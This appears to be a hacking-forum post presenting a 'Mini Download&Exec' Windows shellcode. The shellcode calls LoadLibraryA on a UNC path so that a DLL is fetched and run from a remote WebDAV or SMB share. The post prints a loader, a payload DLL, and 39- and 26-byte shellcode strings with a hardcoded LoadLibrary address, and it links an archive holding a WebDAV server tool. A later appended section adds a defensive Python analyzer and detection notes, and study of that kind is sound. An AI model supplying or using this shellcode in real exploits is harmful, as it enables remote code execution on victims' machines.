Mini Download&Exec shellcode
Author: SlicK

Website: http://www.rstcenter.com/

This download-and-execute method relies on the Windows API LoadLibrary().

It takes as its parameter the path of a file (a DLL or an executable) and maps it into memory.

If the file is a DLL, its entry point function is called with the parameter "DLL_PROCESS_ATTACH".

A less well-known fact about this API is that it can also load files located on WebDAV servers.

WebDAV is an extension of the HTTP protocol that uses similar requests, which however cannot be handled by an ordinary HTTP server without the corresponding extensions.

To load a file via WebDAV, LoadLibrary is called as follows: LoadLibrary("\\SERVER\FILE"), or in C++: LoadLibrary("\\\\SERVER\\FILE");

C++ example (loader.cpp)


#include <windows.h>

int main()
{
    // LoadLibraryA takes a narrow string, so the literal compiles whether or not UNICODE is defined.
    // A UNC path makes the loader fetch the module over SMB or, through the WebClient service, WebDAV.
    LoadLibraryA("\\\\127.0.0.1\\x.dll");
    return 0;
}

Now we also need a DLL to be loaded and run.

C++ example (payload.cpp)


#include <windows.h>

// Entry point invoked by the loader; DLL_PROCESS_ATTACH fires when the DLL is first mapped into the process.
extern "C" BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        // MessageBoxA: narrow-string variant, matching the narrow literals used here.
        MessageBoxA(NULL, "Dll injected successfully.", "Injected", MB_OK | MB_ICONINFORMATION);
    }
    return TRUE;
}

To use this DLL, start Mini WebDAV (you will find it in the archive), choose the directory containing payload.dll, click "Start Server", then run loader.exe.

If everything worked as it should, the message from the DLL ("Dll injected successfully") should appear.

An example of such shellcode could be the following (39 bytes):


char shellcode[]=
"\xE8\x18\x00\x00\x00" // call over the string: pushes the string's address as the return address
"\x5C\x5C\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31\x5C\x70\x61\x79\x6C\x6F\x61\x64\x2E\x64\x6C\x6C\x00" // db '\\127.0.0.1\payload.dll',0 (inline UNC path, NUL-terminated)
"\xBB\x9C\x3F\x88\x7C" // mov ebx,0x7C883F9C ; LoadLibraryA, a fixed address valid only for the kernel32.dll build it was taken from
"\xFF\xD3"; // call ebx ; the pushed string address serves as the lpLibFileName argument

Taking advantage of the API's property of appending ".dll" to file names without an extension, we can shrink the file name, and thus the shellcode, down to 26 bytes:


char shellcode[]=
"\xE8\x0E\x00\x00\x00" // call over the string: pushes the string's address as the return address
"\x5C\x5C\x31\x32\x37\x2E\x30\x2E\x30\x2E\x31\x5C\x78\x00" // db '\\127.0.0.1\x',0 (no extension, so LoadLibrary looks for x.dll)
"\xBB\x9C\x3F\x88\x7C" // mov ebx,0x7C883F9C ; LoadLibraryA, a fixed address valid only for the kernel32.dll build it was taken from
"\xFF\xD3"; // call ebx ; the pushed string address serves as the lpLibFileName argument

If the IP were something like "1.1.1.1", that would bring the shellcode down to 24 bytes, which makes it the smallest shellcode of this kind.
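Both byte strings above share one layout: a CALL that jumps over an inline NUL-terminated UNC path (so the path's address ends up on the stack as the return value), then a hardcoded LoadLibraryA address moved into ebx and called. The following Python triage helper, added here as an example and not part of SlicK's post or archive, parses that layout from an inert byte blob: it checks that the rel32 of the CALL lands exactly past a NUL-terminated string, extracts the host and module name from the UNC path, applies the ".dll"-appending rule the 26-byte variant relies on, and records the fixed address that the stub calls. The two samples are re-typed from the post and labelled as constructed; the function and variable names are my own.

```python
import re
import struct

# Constructed samples: the two byte strings printed in the post, re-typed here so
# the analyzer can run offline. They are inert bytes and are never executed.
SAMPLE_LONG = (
    b"\xE8\x18\x00\x00\x00"
    b"\\\\127.0.0.1\\payload.dll\x00"
    b"\xBB\x9C\x3F\x88\x7C"
    b"\xFF\xD3"
)
SAMPLE_SHORT = (
    b"\xE8\x0E\x00\x00\x00"
    b"\\\\127.0.0.1\\x\x00"
    b"\xBB\x9C\x3F\x88\x7C"
    b"\xFF\xD3"
)

# \\host\rest  (rest may itself contain backslashes)
UNC_RE = re.compile(rb"^\\\\([^\\]+)\\(.+)$")


def effective_module_name(basename):
    """LoadLibrary appends '.dll' when the name has no extension; a trailing '.'
    suppresses that. This mirrors the rule the 26-byte variant relies on."""
    if basename.endswith("."):
        return basename[:-1]
    if "." in basename:
        return basename
    return basename + ".dll"


def analyze_call_string_stub(blob):
    """Recognise the 'E8 rel32, inline NUL-terminated string, code' layout.

    The CALL skips the string and leaves the string's address on the stack as
    the return address, which the code after the string then hands to
    LoadLibraryA as its only argument. Returns a dict of findings, or None when
    the bytes do not follow that layout."""
    if len(blob) < 5 or blob[0] != 0xE8:
        return None
    rel = struct.unpack_from("<i", blob, 1)[0]
    target = 5 + rel                      # offset the CALL lands on
    if rel <= 0 or target > len(blob):
        return None
    inline = blob[5:target]
    if not inline.endswith(b"\x00"):
        return None                       # the skipped-over region must be a C string
    raw_path = inline[:-1]
    findings = {
        "size": len(blob),
        "path": raw_path.decode("latin-1"),
        "unc": False,
        "host": None,
        "effective_name": None,
        "hardcoded_addr": None,
        "calls_ebx": False,
    }
    m = UNC_RE.match(raw_path)
    if m:
        findings["unc"] = True
        findings["host"] = m.group(1).decode("latin-1")
        basename = m.group(2).decode("latin-1").rsplit("\\", 1)[-1]
        findings["effective_name"] = effective_module_name(basename)
    tail = blob[target:]
    # BB imm32 = mov ebx, imm32 ; FF D3 = call ebx
    if len(tail) >= 7 and tail[0] == 0xBB and tail[5:7] == b"\xFF\xD3":
        findings["hardcoded_addr"] = struct.unpack_from("<I", tail, 1)[0]
        findings["calls_ebx"] = True
    return findings


def is_unc_loader_stub(blob):
    """Triage verdict: does this blob look like a 'LoadLibrary a UNC path' stub?"""
    f = analyze_call_string_stub(blob)
    return bool(f and f["unc"] and f["calls_ebx"])


if __name__ == "__main__":
    for label, sample in (("long", SAMPLE_LONG), ("short", SAMPLE_SHORT)):
        f = analyze_call_string_stub(sample)
        print(label, f["size"], "bytes ->", f["host"], f["effective_name"],
              hex(f["hardcoded_addr"]), "unc-loader:", is_unc_loader_stub(sample))
```

Two points the output makes concrete for a defender: the module name the stub resolves to is the one to look for in image-load telemetry (for the short variant that is x.dll, not x), and the fixed LoadLibraryA address ties the stub to one specific kernel32.dll build, which is why such stubs break on any other Windows version. Outbound SMB or WebDAV (WebClient service) traffic from a process that has no business loading modules from a remote share is the other observable this technique leaves behind.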

ARCHIVE: http://rapidshare.com/files/97291649/Mini-D_E.rar.html
